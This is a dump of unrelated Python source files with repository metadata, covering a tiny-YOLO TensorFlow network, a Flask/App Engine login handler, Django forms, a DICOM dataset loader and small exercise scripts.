def dehydrate(integer):
    """
    Turn an integer [integer] into a base [BASE] number
    in string representation.
    """
    # we won't step into the while if integer is 0
    # so we just solve for that case here
    if integer == 0:
        return '0'
    string = ""
    while integer > 0:
        # fix: divmod performs floor division on both Python 2 and 3;
        # the original ``integer /= BASE`` is float (true) division under
        # Python 3 and would corrupt the result
        integer, remainder = divmod(integer, BASE)
        string = true_chr(remainder) + string
    return string
if __name__ == '__main__':
    # not really unit tests just a rough check to see if anything is way off
    # NOTE: Python 2 only (xrange and print statements)
    if sys.argv[1] == '-tests':
        passed_tests = True
        for i in xrange(0, 1000):
            passed_tests &= (i == saturate(dehydrate(i)))
        print passed_tests
    else:
        user_input = sys.argv[2]
        try:
            if sys.argv[1] == '-s':
                print saturate(user_input)
            elif sys.argv[1] == '-d':
                print dehydrate(int(user_input))
            else:
                print "I don't understand option %s" % sys.argv[1]
        except ValueError as e:
            print e
|
[
"allisson@gmail.com"
] |
allisson@gmail.com
|
b040aa04e941c57f0b76efd18287eec086bd0bc9
|
012205c21ad84a179eedff7f8d64b3239ba1a1bc
|
/dayofthe.py
|
6d359397c192f7066f9eddde30a0e37235bdef7c
|
[] |
no_license
|
choiinsung276/LeetCode
|
9348143f5b1324e84172210f157aedc668939566
|
ab44ef7a8f3df078c6b19c4856a5588052685185
|
refs/heads/master
| 2023-04-03T10:54:55.543322
| 2021-04-12T08:40:15
| 2021-04-12T08:40:15
| 284,418,806
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 369
|
py
|
import datetime
import time
def dayOfProgrammer(year):
    """Return the 256th day of *year* formatted as DD.MM.YYYY."""
    # Day-of-year 256 is January 1st plus 255 days; leap years push it
    # from 13 September back to 12 September.
    day256 = datetime.datetime(year, 1, 1) + datetime.timedelta(days=255)
    return day256.strftime('%d.%m.%Y')
if __name__ == '__main__':
    # HackerRank driver: read the year from stdin and print the result
    year = int(input().strip())
    result = dayOfProgrammer(year)
    print(result)
|
[
"noreply@github.com"
] |
noreply@github.com
|
fb22a1e50b8fb1b3c703961bf05569f450ea295b
|
326a1ae06af70676de27ffafda1846c20e903a25
|
/tiny_yolo_net.py
|
6a0b3132e197c9aca0173c8e060a750e0e3d995e
|
[] |
no_license
|
ximikang/tiny_yolov2_tensorflow
|
bad7c8a04bee6ce403f5f89b92cf91718664a75d
|
31c8a72f6bb532fc348ab0f87a558fc19a97f09d
|
refs/heads/master
| 2020-05-15T15:11:42.506487
| 2019-04-20T14:09:28
| 2019-04-20T14:09:28
| 182,365,328
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,389
|
py
|
import sys, os, time
import math
import tensorflow as tf
import numpy as np
# Network input geometry and hyperparameters.
input_height = 416
input_width = 416
bn_epsilon = 1e-3  # NOTE(review): defined but unused in this file — confirm
n_input_imgs = 1
relu_alpha = 0.1   # leaky-ReLU negative slope

with tf.name_scope('input'):
    # NHWC batch of RGB frames; TF1-style placeholder fed at session run time
    images = tf.placeholder(tf.float32, shape=[n_input_imgs,
                                               input_height,
                                               input_width,
                                               3])
def weight_variable(shape):
    """Create a trainable weight tensor initialized from a truncated normal."""
    return tf.Variable(tf.truncated_normal(shape=shape, stddev=0.1))
def bias_variable(shape):
    """Create a trainable bias tensor initialized to zeros."""
    return tf.Variable(tf.constant(0.0, shape=shape))
def max_pool_layer(input_tensor, kernel_size=2, stride=2, padding="VALID"):
    """Spatial max-pooling over an NHWC tensor."""
    window = [1, kernel_size, kernel_size, 1]
    spatial_strides = [1, stride, stride, 1]
    return tf.nn.max_pool(input_tensor, ksize=window, strides=spatial_strides, padding=padding)
def leaky_relu(x, alpha=relu_alpha):
    """Leaky ReLU: identity for positive x, slope *alpha* otherwise."""
    return tf.maximum(x * alpha, x)
def conv2_layer(input_tensor, weight, strides=1, padding='SAME'):
    """2-D convolution over an NHWC tensor with equal spatial strides.

    Bug fix: tf.nn.conv2d's stride vector must be [1, s, s, 1] for NHWC
    input; the original passed [s, s, s, s], which would also stride over
    the batch and channel dimensions for any stride > 1. (All current
    call sites use the default stride of 1, so their output is unchanged.)
    """
    return tf.nn.conv2d(input_tensor, weight,
                        strides=[1, strides, strides, 1],
                        padding=padding)
# Running parameter count. Each conv layer adds kh*kw*in_ch*out_ch weights;
# the extra "+ out_ch*4" term presumably accounts for 4 batch-norm values
# per channel in the original Darknet weight file — TODO confirm (only a
# plain bias is actually built here).
n_params = 0

# conv1: 416x416x3 -> 416x416x16
w1 = weight_variable([3, 3, 3, 16])
b1 = bias_variable([16])
c1 = conv2_layer(images, w1) + b1
conv1 = leaky_relu(c1)
n_params = n_params + 3*3*3*16 + 16*4

# pool1: 416x416x16 -> 208x208x16
max1 = max_pool_layer(conv1)

# conv2: 208x208x16 -> 208x208x32
w2 = weight_variable([3, 3, 16, 32])
b2 = bias_variable([32])
c2 = conv2_layer(max1, w2) + b2
conv2 = leaky_relu(c2)
n_params = n_params + 3*3*16*32 + 32*4

# pool2: 208x208x32 -> 104x104x32
max2 = max_pool_layer(conv2)

# conv3: 104x104x32 -> 104x104x64
w3 = weight_variable([3, 3, 32, 64])
b3 = bias_variable([64])
c3 = conv2_layer(max2, w3) + b3
conv3 = leaky_relu(c3)
n_params = n_params + 3*3*32*64 + 64*4

# pool3: 104x104x64 -> 52x52x64
max3 = max_pool_layer(conv3)

# conv4: 52x52x64 -> 52x52x128
w4 = weight_variable([3, 3, 64, 128])
b4 = bias_variable([128])
c4 = conv2_layer(max3, w4) + b4
conv4 = leaky_relu(c4)
n_params = n_params + 3*3*64*128 + 128*4

# pool4: 52x52x128 -> 26x26x128
max4 = max_pool_layer(conv4)

# conv5: 26x26x128 -> 26x26x256
w5 = weight_variable([3, 3, 128, 256])
b5 = bias_variable([256])
c5 = conv2_layer(max4, w5) + b5
conv5 = leaky_relu(c5)
n_params = n_params + 3*3*128*256 + 256*4

# pool5: 26x26x256 -> 13x13x256
max5 = max_pool_layer(conv5)

# conv6: 13x13x256 -> 13x13x512
w6 = weight_variable([3, 3, 256, 512])
b6 = bias_variable([512])
c6 = conv2_layer(max5, w6) + b6
conv6 = leaky_relu(c6)
n_params = n_params + 3*3*256*512 + 512*4

# pool6: stride-1 SAME pooling keeps spatial size, 13x13x512 -> 13x13x512
max6 = max_pool_layer(conv6, kernel_size=2, stride=1, padding='SAME')

# conv7: 13x13x512 -> 13x13x1024
w7 = weight_variable([3, 3, 512, 1024])
b7 = bias_variable([1024])
c7 = conv2_layer(max6, w7) + b7
conv7 = leaky_relu(c7)
n_params = n_params + 3*3*512*1024 + 1024*4

###############################
# conv8: 13x13x1024 -> 13x13x1024
w8 = weight_variable([3, 3, 1024, 1024])
b8 = bias_variable([1024])
c8 = conv2_layer(conv7, w8) + b8
conv8 = leaky_relu(c8)
n_params = n_params + 3*3*1024*1024 + 1024*4

# detection head (1x1 conv, linear activation): 13x13x1024 -> 13x13x125
# NOTE(review): 125 presumably = 5 anchors * (20 classes + 5 box params)
# for VOC-style tiny-YOLOv2 — confirm against the weight file used.
w9 = weight_variable([1, 1, 1024, 125])
b9 = bias_variable([125])
net_out = conv2_layer(conv8, w9) + b9
n_params = n_params + 1*1*1024*125 + 125
|
[
"ximikang@outlook.com"
] |
ximikang@outlook.com
|
a993b8752d0dd150150559856ca00158b1dc84b1
|
96993d530a3bdc13bb307afac3eb1081425e36ea
|
/30 Days Challenge/19.py
|
e46d10a0a741217e8cb47289a88d6a117cb20b43
|
[] |
no_license
|
mayankkgandhi/Coding-Challenges
|
bea5e317bb93cbdd17c6b31355f2771a6d01c26c
|
6c99e74d0996a1aebe5efadb00cce4d9458182fb
|
refs/heads/master
| 2021-01-21T17:28:31.876351
| 2018-06-01T06:11:43
| 2018-06-01T06:11:43
| 85,462,237
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 418
|
py
|
class Solution:
    """Character stack + queue (HackerRank 30 Days, palindrome check).

    ``pushCharacter``/``popCharacter`` give LIFO order;
    ``enqueueCharacter``/``dequeueCharacter`` give FIFO order.
    """

    def __init__(self):
        # deque gives O(1) pops from the left; list.pop(0) is O(n)
        from collections import deque
        self.stack = []
        self.queue = deque()

    def pushCharacter(self, item):
        """Push *item* onto the stack."""
        self.stack.append(item)

    def enqueueCharacter(self, item):
        """Append *item* to the back of the queue."""
        self.queue.append(item)

    def popCharacter(self):
        """Remove and return the most recently pushed item."""
        return self.stack.pop()

    def dequeueCharacter(self):
        """Remove and return the oldest enqueued item."""
        return self.queue.popleft()
|
[
"noreply@github.com"
] |
noreply@github.com
|
dd2fd62056c6386cf4a8440a07cb3d3e6503200e
|
2284d84f45d11386a0754554d335942b48f0c0b2
|
/fall 2015 OSU/Predoviv_CS496_FinalProject_Fall2015/_CS496_CloudFinal_Fall2015_predoviv/UserAuth.py
|
a4adc2a4ce5e6da13606e8fe8f7952bdc2ba4af0
|
[] |
no_license
|
Vladis466/Homework
|
d2db6a81e8dd672fdb87ddfc18990f2e99b5cbd3
|
c7d94f722808bf0d9b3edd25fe27a8e557989ac9
|
refs/heads/master
| 2020-04-12T08:57:42.445384
| 2016-12-23T03:28:53
| 2016-12-23T03:28:53
| 38,588,792
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,969
|
py
|
import webapp2
from google.appengine.ext import ndb
import db_models
import json
from datetime import datetime
import hashlib
class userAuth(webapp2.RequestHandler):
    """App Engine handler for registering and logging in app users."""

    def post(self):
        """Register a new user or check login credentials.

        POST body variables:
          userName - the account name
          passWord - the plaintext password (MD5-hashed before storage)
          Choice   - 'Register' or 'Login'
        """
        if 'application/json' not in self.request.accept:
            self.response.status = 406
            self.response.status_message = 'Not Acceptable, API only supports application/json MIME type'
            return
        newUser = db_models.appUsers()
        Uname = self.request.get('userName', default_value=None)
        # SECURITY NOTE(review): unsalted MD5 is not a safe password hash;
        # consider PBKDF2/bcrypt. Left as-is for compatibility with
        # already-stored hashes.
        Upass = hashlib.md5(self.request.get('passWord', default_value=None)).hexdigest()
        Choice = self.request.get('Choice', default_value=None)
        existCheck = db_models.appUsers.query(db_models.appUsers.userName == Uname).fetch()
        # fix: the original combined the two filters with the Python ``and``
        # operator, which evaluates to only the SECOND filter — login was
        # matched on the password alone. Passing both filters as separate
        # query() arguments ANDs them properly.
        logCheck = db_models.appUsers.query(
            db_models.appUsers.userName == Uname,
            db_models.appUsers.passWord == Upass).fetch()
        if Choice == 'Register':
            if existCheck:
                self.response.status = 400
                self.response.status_message = 'Invalid request. User already exists'
                self.response.write('nope')
            else:
                newUser.userName = Uname
                newUser.passWord = Upass
                newUser.put()
                self.response.write('Registered')
        if Choice == 'Login':
            # make sure the name and password match
            if logCheck:
                self.response.write('yes')
                self.response.status_message = 'Succesfull Login!!'
            else:
                self.response.write('no')
                self.response.status_message = 'Bad credentials!!'
            return
        return

    def get(self, **kwargs):
        """Write every stored appUsers entity back in the response body."""
        if 'application/json' not in self.request.accept:
            self.response.status = 406
            self.response.status_message = 'Not Acceptable, API only supports application/json MIME type'
            return
        # keys-only fetch is cheaper; the original also ran a redundant
        # full entity fetch whose result was never used
        keys = db_models.appUsers.query().fetch(keys_only=True)
        for a in keys:
            Inst = a.get()
            self.response.write(Inst)
            self.response.write('<br><br>')
|
[
"predovic900@gmail.com"
] |
predovic900@gmail.com
|
567ce10d50799ef515908a632d690c0a82e045ba
|
8ec08780863a056c7eab0b653eb79ee0abb228a9
|
/2/example_2/manage.py
|
cf6f0460ae4ce8ea53be03553fd85e5de00e42b1
|
[] |
no_license
|
mikolaz27/itvdn_essential
|
f38483853fb802c52032547301cf06073b9dda03
|
7c7b401fcea237589fc08acfc52094c3e808e6cb
|
refs/heads/main
| 2023-05-08T06:43:56.420849
| 2021-05-30T14:49:47
| 2021-05-30T14:49:47
| 372,226,821
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 629
|
py
|
#!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
    """Run Django's command-line utility with this project's settings."""
    # default the settings module; an existing env var takes precedence
    os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'example_2.settings')
    try:
        from django.core.management import execute_from_command_line
    except ImportError as exc:
        raise ImportError(
            "Couldn't import Django. Are you sure it's installed and "
            "available on your PYTHONPATH environment variable? Did you "
            "forget to activate a virtual environment?"
        ) from exc
    execute_from_command_line(sys.argv)


if __name__ == '__main__':
    main()
|
[
"mikolaz2727@gmail.com"
] |
mikolaz2727@gmail.com
|
d46ddaa64e3b6baa8dd6e9f533ac94ef9cd35e2b
|
a66ce923327975ccaaa4f66e1f55afa2e4b448ac
|
/Store/account/forms.py
|
c34d44b8e4898920f3b6551fe009d0d4fafec21b
|
[] |
no_license
|
Digindataflow/Front-end-UI-framework
|
506878b41cb9f373216381fe9a10b831fff985cd
|
901aaa2c168305a0a674ba79e74a48e5ab8dedcc
|
refs/heads/master
| 2020-04-18T23:24:02.443405
| 2019-04-09T19:14:31
| 2019-04-09T19:14:31
| 167,820,508
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,803
|
py
|
import logging
from django import forms
from django.contrib.auth import authenticate
from django.contrib.auth.forms import \
UserCreationForm as DjangoUserCreationForm
from django.contrib.auth.forms import UsernameField
from account import models
logger = logging.getLogger(__name__)
class UserCreationForm(DjangoUserCreationForm):
    """Signup form keyed on the email field instead of a username."""

    class Meta(DjangoUserCreationForm.Meta):
        model = models.User
        fields = ("email",)
        field_classes = {"email": UsernameField}

    def send_mail(self):
        """Send the welcome email to the address that just signed up.

        Bug fix: the original called ``send_mail(...)`` without importing
        Django's mail helper anywhere in the module (the global name would
        have raised NameError at runtime); it is imported locally because
        this method itself shadows the name at class scope.
        """
        from django.core.mail import send_mail
        logger.info(
            "Sending signup email for email=%s",
            self.cleaned_data["email"],
        )
        message = "Welcome{}".format(self.cleaned_data["email"])
        send_mail(
            "Welcome to the Store",
            message,
            "account.manager@store.domain",
            [self.cleaned_data["email"]],
            fail_silently=True,
        )
class AuthenticationForm(forms.Form):
email = forms.EmailField()
password = forms.CharField(
strip=False, widget=forms.PasswordInput
)
def __init__(self, request=None, *args, **kwargs):
self.request = request
self.user = None
super().__init__(*args, **kwargs)
def clean(self):
email = self.cleaned_data.get("email")
password = self.cleaned_data.get("password")
if email is not None and password:
self.user = authenticate(
self.request, email=email, password=password
)
if self.user is None:
raise forms.ValidationError(
"Invalid email/password combination."
)
logger.info(
"Authentication successful for email=%s", email
)
return self.cleaned_data
def get_user(self):
return self.user
|
[
"31276943+Digindataflow@users.noreply.github.com"
] |
31276943+Digindataflow@users.noreply.github.com
|
12d348d7fe7ca51553671f1264e7e363ff72bc1e
|
3b119f8ab6fe8143fd30f84f173e7439b99d2244
|
/Adversarial-Playground-Text-viz/virt/lib/python3.6/site-packages/ebcli/__init__.py
|
2da9cab754255587e11f8f24184749fa9ed2cd71
|
[
"Apache-2.0"
] |
permissive
|
AnupKumarGupta/deepWordBug
|
4952bcfd7b97bd2ce8400bf865704baaf44d2b52
|
c6513e6421fa5204b07652fc3f619b1018696df2
|
refs/heads/master
| 2020-11-25T17:06:30.608123
| 2019-12-18T05:57:54
| 2019-12-18T05:57:54
| 228,767,282
| 0
| 0
|
Apache-2.0
| 2019-12-18T05:46:36
| 2019-12-18T05:46:35
| null |
UTF-8
|
Python
| false
| false
| 616
|
py
|
#!/usr/bin/env python
# Copyright 2012-2013 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
__version__ = '3.15.0'
|
[
"jjf4bz@virginia.edu"
] |
jjf4bz@virginia.edu
|
3053257f100bb3a498cc2c1443c5675748f9d3fa
|
4efe4df9a4348bc8fd137cd17e6dd06130ffbc3a
|
/klasa 3/py/max.py
|
ec31064216cee5fafec31e9d36aee10800c94ed3
|
[] |
no_license
|
arewera290601/mojprojekt
|
5c6f6ba9b9c357697b95d573a80dbc762ae2e1ec
|
3208e87fde89822888646caa319633934e46f672
|
refs/heads/master
| 2022-12-11T02:59:14.517360
| 2020-03-10T07:32:52
| 2020-03-10T07:32:52
| 104,380,604
| 0
| 0
| null | 2022-12-03T00:04:02
| 2017-09-21T17:53:45
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 481
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# max.py
#
def main(args):
a = int(input('Podaj 1. liczbę: '))
print(a)
b = int(input('Podaj 2. liczbę: '))
print(b)
c = int(input('Podaj 3. liczbę: '))
print(c)
if b <= a >= c:
print(a,"jest największe")
elif a <= b >=c:
print(b,"jest największe")
else:
print(c,"jest największe")
return 0
if __name__ == '__main__':
import sys
sys.exit(main(sys.argv))
|
[
"aleksandrarewera@gmail.com"
] |
aleksandrarewera@gmail.com
|
53b69204f5457e823553f9ce84a8956193ef558c
|
110038d9a254bfb4dd6ab8db799e6b9f06053a08
|
/custom_modules/cloud.py
|
f5ca014d9ce4dea5efe30e947e998d4bc060de19
|
[] |
no_license
|
brajenful/voltbot
|
f8db3597d51896813bf32f8de7e8723ba3d243b2
|
eea9717229a5c8fe640491ae16b2cdfcd563ceee
|
refs/heads/master
| 2020-09-12T18:42:17.932262
| 2019-11-18T19:43:15
| 2019-11-18T19:43:15
| 222,513,994
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 23
|
py
|
class Cloud(object):
|
[
"noreply@github.com"
] |
noreply@github.com
|
5c107d3057995ffc314bc3eebe9f4fdb39227a36
|
321e58ab3e6b2385bb3549aaaefd56a58c2a51e7
|
/python/atpic/atcookies.py
|
1d2ea4668a4d530a17d2d2233e73e24b0279454c
|
[] |
no_license
|
alexmadon/atpic_photosharing
|
7829118d032344bd9a67818cd50e2c27a228d028
|
9fdddeb78548dadf946b1951aea0d0632e979156
|
refs/heads/master
| 2020-06-02T15:00:29.282979
| 2017-06-12T17:09:52
| 2017-06-12T17:09:52
| 94,095,494
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 623
|
py
|
# cookies libary to process
# lang, format, resolution, wiki
# file:///home/madon/doc/python-3.3a0-docs-html/library/http.cookies.html
from http import cookies
C = cookies.SimpleCookie()
C["fig"] = "newton"
C["sugar"] = "wafer"
print(C)
C = cookies.SimpleCookie()
C["rocky"] = "road"
C["rocky"]["path"] = "/cookie"
print(C.output(header="Cookie:"))
print(C["rocky"].value)
print(C.output(header=''))
print(dir(C["rocky"]))
print(C["rocky"].values())
print(C["rocky"].output())
print(C["rocky"].coded_value)
print(C["rocky"].OutputString())
C = cookies.SimpleCookie()
C.load("chips=ahoy; vienna=finger")
print(C.keys())
|
[
"alex.madon@gmail.com"
] |
alex.madon@gmail.com
|
71bc398215f05023c66de7b67055c6c4452211b3
|
71dfa5d568d408fd8464a1313f87c1133e3d061c
|
/ATS/urls.py
|
b3d6e11901bbb899f6983c3d21e1d181763c2df1
|
[] |
no_license
|
harshdonga/Alumni-Tracking-System
|
3819e26e82145ca2cf277c1f260494cb6a6fbd4c
|
f0c836d5fb405f8b61fb73d78acc4c47802a9c11
|
refs/heads/master
| 2020-12-29T17:48:13.989148
| 2020-02-07T04:27:59
| 2020-02-07T04:27:59
| 238,687,836
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 165
|
py
|
from django.contrib import admin
from django.urls import path, include
urlpatterns = [
path('admin/', admin.site.urls),
path('', include('alumni.urls')),
]
|
[
"harshdonga99@gmail.com"
] |
harshdonga99@gmail.com
|
aee41c0c2c03281e6e8007b3927b19f1257ead15
|
55ed6b1305748eda1466c0420b8d99f43717522b
|
/Visual Studio 2010/CSBasics/Calculator.py
|
402a68ff535d47dc89a692ded3fd73a90e638ecb
|
[] |
no_license
|
2mhk/All-In-One-Code-Framework
|
de53599dd599fd84a9d6a21421336633153bd67e
|
cf711261c52d51d1c9e903d2395d7f200b392743
|
refs/heads/master
| 2022-03-01T21:15:02.668420
| 2019-09-13T14:59:40
| 2019-09-13T14:59:40
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 120
|
py
|
class Calculator:
def Add(self, a, b):
return a + b
def GetCalculator():
return Calculator()
|
[
"jdm7dv@gmail.com"
] |
jdm7dv@gmail.com
|
6fcf96971585787a1fc2e480d331c451935bd745
|
af209804e1d37b9d4343efe2768560f81c925b1f
|
/app.py
|
7922c1de15f33f66b07c19f09c655e92dab5daed
|
[] |
no_license
|
mstoro/nasa_api
|
5ee06e831f188936f0ac72f301acd4305bd4fa57
|
05dd5012315561085664866e32ffa93efae5308f
|
refs/heads/master
| 2023-03-19T22:32:02.094177
| 2021-03-10T14:22:51
| 2021-03-10T14:22:51
| 340,974,711
| 0
| 0
| null | 2021-03-10T14:22:52
| 2021-02-21T18:34:44
|
Python
|
UTF-8
|
Python
| false
| false
| 425
|
py
|
from flask import Flask, jsonify
from api.apod import apod_api
from api.cme import cme_api
from api.errors import BaseError
app = Flask(__name__)
app.config.from_object('config.Config')
app.register_blueprint(apod_api)
app.register_blueprint(cme_api)
@app.errorhandler(BaseError)
def handle_token_errors(error):
app.logger.error(error.json)
return jsonify(error.json)
if __name__ == '__main__':
app.run()
|
[
"mstoro@softserveinc.com"
] |
mstoro@softserveinc.com
|
fc4c4a1cb40afbc6917498e7444d9ab49055ad29
|
6c7a9e4bca9828325219cfca420dae8567bd180d
|
/code/lumar_dataset.py
|
0dd430bc2b617c4d44374b59d012fe47a7016043
|
[] |
no_license
|
PYGang/lumbar_project
|
b91717b6c3174de753da2afb56232c95cd6b0c8f
|
a8531aa3a87237a454ab7ac663906824e487ec06
|
refs/heads/master
| 2022-12-14T23:57:01.848387
| 2020-08-23T06:53:05
| 2020-08-23T06:53:05
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,203
|
py
|
from torch.utils.data import Dataset
import os
import pandas as pd
import glob
import SimpleITK as sitk
import numpy as np
import random
import cv2
def dicom_metainfo(dicm_path, list_tag):
'''
获取dicom的元数据信息
:param dicm_path: dicom文件地址
:param list_tag: 标记名称列表,比如['0008|0018',]
:return:
'''
reader = sitk.ImageFileReader()
reader.LoadPrivateTagsOn()
reader.SetFileName(dicm_path)
reader.ReadImageInformation()
return [reader.GetMetaData(t) for t in list_tag]
def dicom2array(dcm_path):
'''
读取dicom文件并把其转化为灰度图(np.array)
https://simpleitk.readthedocs.io/en/master/link_DicomConvert_docs.html
:param dcm_path: dicom文件
:return:
'''
image_file_reader = sitk.ImageFileReader()
image_file_reader.SetImageIO('GDCMImageIO')
image_file_reader.SetFileName(dcm_path)
image_file_reader.ReadImageInformation()
image = image_file_reader.Execute()
if image.GetNumberOfComponentsPerPixel() == 1:
image = sitk.RescaleIntensity(image, 0, 255)
if image_file_reader.GetMetaData('0028|0004').strip() == 'MONOCHROME1':
image = sitk.InvertIntensity(image, maximum=255)
image = sitk.Cast(image, sitk.sitkUInt8)
img_x = sitk.GetArrayFromImage(image)[0]
return img_x
class LumarDataset(Dataset):
def __init__(self,json_file):
super().__init__()
self.json_file = json_file
self.datas = []
self.points = []
self.rois = []
self.wh = []
self.sample_size = 64
self.parse_json()
def __len__(self):
return len(self.rois)
def in_rect(self,p,x,y):
# print(p,x,y)
return all([p[0] > x , p[1] > y , p[0] < x + self.sample_size , p[1] < y + self.sample_size])
# return p[0] > x and p[1] > y and p[0] < x + self.sample_size and p[1] < y + self.sample_size
def __getitem__(self, idx):
roi = self.rois[idx]
img = self.datas[idx]
h,w = img.shape
item_size = self.sample_size
if random.random() < 0.8:
#get item from roi
print(roi[0],min(roi[2],w) - item_size)
xmin = roi[0]
xmax = roi[2] - item_size
if xmin > xmax:
center =int((roi[0] + roi[2])/2)
xmin = max(center - 80,0)
xmax = min(center + 80,w-self.sample_size)
x1 = random.randint(xmin,xmax)
ymin = roi[1]
ymax = roi[3] - item_size
if ymin < ymax:
center = int((roi[1] + roi[3])/2)
ymin = max(center - 80,0)
ymax = min(center + 80, w - self.sample_size)
y1 = random.randint(ymin,ymax)
else:
x1 = random.randint(0,w-item_size)
y1 = random.randint(0,h-item_size)
item_img = img[y1:item_size+y1,x1:x1+item_size]
item_points = []
for p in self.points[idx]:
if self.in_rect(p,x1,y1):
item_points.append(p)
return item_img,item_points
def parse_json(self):
jsonPath = self.json_file
trainPath = os.path.join(os.path.dirname(jsonPath), "train")
annotation_info = pd.DataFrame(columns=('studyUid', 'seriesUid', 'instanceUid', 'annotation'))
json_df = pd.read_json(jsonPath)
for idx in json_df.index:
studyUid = json_df.loc[idx, "studyUid"]
seriesUid = json_df.loc[idx, "data"][0]['seriesUid']
instanceUid = json_df.loc[idx, "data"][0]['instanceUid']
annotation = json_df.loc[idx, "data"][0]['annotation']
row = pd.Series(
{'studyUid': studyUid, 'seriesUid': seriesUid, 'instanceUid': instanceUid, 'annotation': annotation})
annotation_info = annotation_info.append(row, ignore_index=True)
dcm_paths = glob.glob(os.path.join(trainPath, "**", "**.dcm"))
# 'studyUid','seriesUid','instanceUid'
tag_list = ['0020|000d', '0020|000e', '0008|0018']
dcm_info = pd.DataFrame(columns=('dcmPath', 'studyUid', 'seriesUid', 'instanceUid'))
for dcm_path in dcm_paths:
try:
studyUid, seriesUid, instanceUid = dicom_metainfo(dcm_path, tag_list)
row = pd.Series(
{'dcmPath': dcm_path, 'studyUid': studyUid, 'seriesUid': seriesUid, 'instanceUid': instanceUid})
dcm_info = dcm_info.append(row, ignore_index=True)
except:
continue
result = pd.merge(annotation_info, dcm_info, on=['studyUid', 'seriesUid', 'instanceUid'])
# print(result.head())
# result = result.set_index('dcmPath')
result = result.set_index('dcmPath')['annotation']
# print(result.head())
parse_annotations = result
gt_db = []
# for a in anno:
for row in result.iteritems():
image_name = row[0]
img = dicom2array(row[0])
self.wh.append(img.shape)
self.datas.append(img)
# c = c - 1
joints_3d = np.zeros((11, 3), dtype=np.float)
points = row[1][0]['data']['point']
x1 = 100000
y1 = 100000
x2 = 0
y2 = 0
for i, item in enumerate(points):
corrd = item['coord']
joints_3d[i, 0] = corrd[0]
joints_3d[i, 1] = corrd[1]
x1 = min(corrd[0],x1)
y1 = min(corrd[1],y1)
x2 = max(corrd[0],x2)
y2 = max(corrd[1],y2)
self.points.append(joints_3d)
x1 = max(0,x1-20)
y1 = max(0,y1-20)
x2 = min(img.shape[1],x2 + 20)
y2 = min(img.shape[0],y2 + 20)
self.rois.append([x1,y1,x2,y2])
jpath = "/home/wang/PycharmProjects/tianchi/lumbar_train150/lumbar_train150_annotation.json"
test_dataset = LumarDataset(jpath)
for idx,(img,pts) in enumerate(test_dataset):
print(idx,img.shape)
cv2.imshow("img",img)
cv2.waitKey(0)
|
[
"lianjunwang@sf-mail.com"
] |
lianjunwang@sf-mail.com
|
0c22d21f73349427abf47043b7db76828b4a41cf
|
cf7525111bd2a934c1bf9f5d212a2af3f074b1da
|
/temperature_conditionals/temperature_conditionals.py
|
d0930cb011449ddd9563a920280699042f829b32
|
[] |
no_license
|
sealanguage/april2021refresh
|
6f0565b503d729e8083cb61d3645325b3421ab09
|
2aacc00b53f9104e8fd46cc592987a418f5927c7
|
refs/heads/main
| 2023-06-04T19:49:56.025763
| 2021-06-28T01:57:24
| 2021-06-28T01:57:24
| 355,743,010
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 318
|
py
|
# if temperature is greater than 80
# its a hot day
# otherwise if its less than 40
# its a cold day
# otherwise
# its neither hot nor cold
temperature = 80
if temperature > 80:
print("It's a hot day")
elif temperature < 40:
print("It's a cold day")
else:
print("It's neither hor nor cold")
|
[
"elaine.froehlich@gmail.com"
] |
elaine.froehlich@gmail.com
|
12653a9230e31f36f069346ee3f03bd3ee78ea3b
|
a444b78c28a72a23bf3592822d0a8dcebf4abae1
|
/TEST_6.py
|
c7ab970f202a951f9212623940893f22fe11add8
|
[] |
no_license
|
LordFlashmeow/Using-sorted-file-to-plot-X-axis-scatter-graph-with-corresponding-Y-values-from-the-original-file
|
2aa6b495bc197d54c6d09246c8a26a802f62b1b8
|
01b844f7d86af83aafed15b4b98193c23226ac82
|
refs/heads/master
| 2020-06-12T13:41:55.952119
| 2019-06-26T18:57:15
| 2019-06-26T18:57:15
| 194,318,284
| 0
| 0
| null | 2019-06-28T18:34:29
| 2019-06-28T18:34:28
| null |
UTF-8
|
Python
| false
| false
| 2,371
|
py
|
from matplotlib import pyplot as plt
import numpy as np
from textwrap import wrap
import csv
#Opens the sorted hostnum.csv file and reads it; replaces the quotation marks.
csv_file = []
with open('hostnum.csv', 'r') as host:
for line in host.readlines():
line = line.replace('"', '')
line = line.strip('\n')
rank, value = line.split(" ")
csv_file.append(value)
#Opens the file and reads it
us_csv_file = []
with open('fileFirst.csv', 'r') as f:
csvreader = csv.reader(f)
for line in csvreader:
us_csv_file.append(line)
us_csv_file1 = []
with open('fileSecond.csv', 'r') as f:
csvreader = csv.reader(f)
for line in csvreader:
us_csv_file1.append(line)
us_csv_file2 = []
with open('fileThird.csv', 'r') as f:
csvreader = csv.reader(f)
for line in csvreader:
us_csv_file2.append(line)
#Sorts the files using sorted file's index number - first coumn (x[0])
us_csv_file.sort(key=lambda x: csv_file.index(x[0]))
us_csv_file1.sort(key=lambda x: csv_file.index(x[0]))
us_csv_file2.sort(key=lambda x: csv_file.index(x[0]))
#scatters the symbols on the graph
plt.scatter(range(len(us_csv_file)), [int(item[1]) for item in us_csv_file], c='b', marker='+', label="First")
